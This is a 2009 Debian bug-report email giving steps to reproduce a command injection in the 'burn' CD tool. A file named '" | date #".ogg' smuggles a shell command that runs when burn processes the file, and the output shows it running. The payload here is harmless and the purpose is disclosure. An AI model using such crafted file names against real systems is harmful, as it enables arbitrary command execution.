package burn tags 542329 - unreproducible thanks On 21-Aug-2009, Philipp Weis wrote: > Yes, the quotes are part of the filename and crucial to the exploit.
Thanks. For the record, here are the steps I use to successfully
reproduce this bug:
* Start with a known Ogg Vorbis file (in my case, ‘postgresql.ogg’).
* Copy the file to a problematic filename::
$ mv postgresql.ogg '" | date #".ogg'
$ ls -1 *.ogg
" | date #".ogg
* Run ‘burn’ (with no disc in the drive)::
$ sudo burn -A -a ~/*.ogg
Burn v.0.4.4 Written by Gaetano Paolone.
Burn until recorded, now!
This software comes with absolutely no warranty! Use at your own risk!
Burn is free software.
See software updates at <URL:http://www.bigpaul.org/burn/>.
Audio-CD...
Audio file processing. Please wait...
To be burned: 0 Mb
Disk space needed: 0 Mb
Media capacity: 700 Mb
Free disk space: 1294 Mb
---------------------------------------------
Burn - Track summary
---------------------------------------------
1 ) 0:03 - /home/bignose/" | date #".ogg
Total Audio-CD: 0:03
Performing audio decoding with external decoder.
[1/1] OGG Processing /home/bignose/" | date #".ogg
Fri Aug 21 23:37:35 EST 2009
[…]
--
\ “Speech is conveniently located midway between thought and |
`\ action, where it often substitutes for both.” —John Andrew |
_o__) Holmes, _Wisdom in Small Doses_ |
Ben Finney <b...@benfinney.id.au>
signature.asc
Description: Digital signature
